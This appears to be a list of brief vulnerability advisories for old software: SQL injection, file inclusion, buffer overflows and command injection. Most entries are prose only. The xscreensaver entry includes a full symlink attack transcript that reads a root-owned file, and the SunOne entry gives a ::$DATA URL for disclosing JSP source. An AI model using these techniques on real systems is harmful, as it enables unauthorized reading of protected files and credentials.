The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'p' and 'Template' parameters to '/show.php' and '/admin/pages/SiteNew.php' scripts respectively. A remote attacker can include arbitrary files from local resources and execute arbitrary PHP code on the vulnerable system.
PatPlayer v3.9 is vulnerable to a local heap overflow vulnerability when a specially crafted M3U file is opened. The vulnerability is caused due to a boundary error when handling the '#EXTM3U' header of the M3U file. This can be exploited to cause a stack-based buffer overflow by overflowing a buffer with a specially crafted M3U file containing an overly long '#EXTM3U' header.
Multiple SQL injection vulnerabilities exist in phpBMS v0.96 due to improper sanitization of user-supplied input. An attacker can exploit these vulnerabilities to gain access to sensitive information such as login credentials, passwords, etc. The first vulnerability exists in the 'invoices_discount_ajax.php' script, where the 'id' parameter is not properly sanitized before being used in a SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements. The second vulnerability exists in the 'dbgraphic.php' script, where the 'f', 'mf', 't', and 'r' parameters are not properly sanitized before being used in a SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements. The third vulnerability exists in the 'advancedsearch.php' script, where the 'tid' and 'base' parameters are not properly sanitized before being used in a SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements.
This proof-of-concept code exploits a stack buffer overflow vulnerability in Internet Explorer. The vulnerability is triggered when a user adds a maliciously crafted URL to their favorites list. The code creates a long string of characters and passes it to the vulnerable function, which causes a stack buffer overflow.
Universe CMS 1.0.6 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability to gain access to the admin panel of the application. The exploit code uses the 'id' parameter in the 'vnews.php' script to inject malicious SQL code into the application. The malicious code is used to extract the admin username and password from the 'uni_users' table.
Siteframe CMS version 3.2.x is vulnerable to SQL Injection and phpinfo() Disclosure. An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable parameter 'id' in the document.php file. An attacker can also access the phpinfo.php file to view the system information.
The �xscreensaver� program distributed normally with Xorg can be abused to disclose local files owned by other users (also of the root account). Xscreensaver has the setuid bit on by default (Example: Opensolaris). The xscreensaver program uses the file ~/.xscreensaver to read configuration options from. If this file is a symlink to another file then this file is parsed and output is shown on the display. It has to be noted that during the parsing of the file it may be possible that not the full file contents will be shown. Here is an example attack scenario on an Opensolaris default install (with Xorg): kcope@opensolaris:~# ls -la /root/db.php && cat /root/db.php -rw------- 1 root root 61 Dez 27 17:59 /root/db.php $db_user = "root"; $db_pass = "secret"; kcope@opensolaris:~$ ln -s /root/db.php ~/.xscreensaver kcope@opensolaris:~$ ls -la ~/.xscreensaver lrwxrwxrwx 1 kcope staff 12 1986-12-27 18:01 /export/home/kcope/.xscreensaver -> /root/db.php kcope@opensolaris:~$ xscreensaver -verbose xscreensaver 5.01, copyright (c) 1991-2006 by Jamie Zawinski <jwz@jwz.org>. xscreensaver: running as kcope/staff (101/10); effectively root/staff (0/10) xscreensaver: in process 2186. xscreensaver: /export/home/kcope/.xscreensaver:1: unparsable line: $db_user = "root"; xscreensaver: /export/home/kcope/.xscreensaver:2: unparsable line: $db_pass = "secret"; xscreensaver: 18:02:26: running /usr/X11/lib/xscreensaver/bin/xscreensaver-gl-helper: No such file or directory xscreensaver: 18:02:26: /usr/X11/lib/xscreensaver/bin/xscreensaver-gl-helper did not report a GL visual! ................................. ................................. ................................. As one can see in the above output the contents of the root owned file db.php is shown in the xscreensaver output.
SunOne WebServer (formerly Netscape Enterprise Server, iPlanet) on Windows Systems lets remote people disclose JSP Source code. A normal URL would look like: http://server/hello.jsp and to disclose the contents including source code of a JSP file: http://server/hello.jsp::$DATA
The Talkback V 2.3.14 script is vulnerable to command injection. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'result' parameter in the 'talkback/addons/import.php' script. An attacker can exploit this vulnerability to execute arbitrary commands on the vulnerable system with the privileges of the web server process.
A remote SQL injection vulnerability exists in EasyVillaRentalSite. An attacker can exploit this vulnerability to gain access to sensitive information such as user credentials, database name, and version. This is achieved by sending a specially crafted HTTP request to the vulnerable application containing malicious SQL statements in the 'Id' parameter of the 'show_category.php' script.
Services By CQR